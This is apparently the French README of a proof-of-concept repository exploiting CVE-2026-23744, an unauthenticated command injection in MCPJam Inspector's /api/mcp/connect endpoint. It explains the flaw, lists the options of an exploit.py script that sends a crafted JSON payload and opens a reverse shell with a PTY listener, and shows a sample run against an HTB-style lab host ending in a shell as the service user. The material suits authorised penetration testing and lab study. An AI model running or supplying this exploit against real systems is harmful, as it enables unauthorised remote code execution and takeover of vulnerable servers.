
CVE-2026-23744 est une injection de commande non authentifiée dans MCPJam Inspector ≤1.4.2 via /api/mcp/connect. Ce POC l'exploite en envoyant une charge utile JSON spécialement conçue pour exécuter des commandes arbitraires, permettant d'obtenir un reverse shell avec PTY.
Cette preuve de concept est fournie exclusivement pour la recherche en sécurité autorisée, à des fins pédagogiques et dans des environnements de laboratoire contrôlés (par exemple, HTB, CTF, ou tests d'intrusion internes avec consentement écrit explicite). Toute utilisation non autorisée contre un système sans permission est illégale et contraire à l'éthique. L'auteur décline toute responsabilité en cas de mauvaise utilisation ; les utilisateurs sont seuls responsables du respect de toutes les lois et réglementations applicables.
CVE-2026-23744 est une vulnérabilité d'injection de commandes non authentifiée dans MCPJam Inspector (version ≤ 1.4.2).
Le point de terminaison /api/mcp/connect accepte une charge utile JSON avec serverConfig.command et serverConfig.args et les transmet directement au lancement d'un processus système sans aucun assainissement. Un attaquant peut envoyer une requête spécialement conçue pour exécuter des commandes système arbitraires, obtenant ainsi un shell inversé avec les privilèges de l'utilisateur du service.
Ce dépôt contient un script d'exploitation complet et fonctionnel avec un écouteur interactif automatique facultatif basé sur PTY (activé par défaut).
requests (pip install requests)Important : Fournissez uniquement le nom d'hôte ou l'IP. Le script ajoute automatiquement http:// ou https://
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
| Option | Description |
|---|---|
-t, --target | Nom d'hôte ou IP de la cible (obligatoire) |
-p, --port | Port de la cible (défaut : 6274) |
-l, --lhost | Votre IP pour le shell inversé (obligatoire) |
-r, --lport | Port de votre écouteur (défaut : 4444) |
--ssl | Utiliser HTTPS au lieu de HTTP |
--check-only | Vérifier uniquement la vulnérabilité, sans envoyer le shell |
Le script démarre son propre écouteur et vous donne un shell directement dans votre terminal.
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!
# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)
root.Ce dépôt est destiné uniquement à des fins éducatives et aux tests autorisés. Utilisation à vos propres risques.
Auteur : Mluex0 Date : août 2026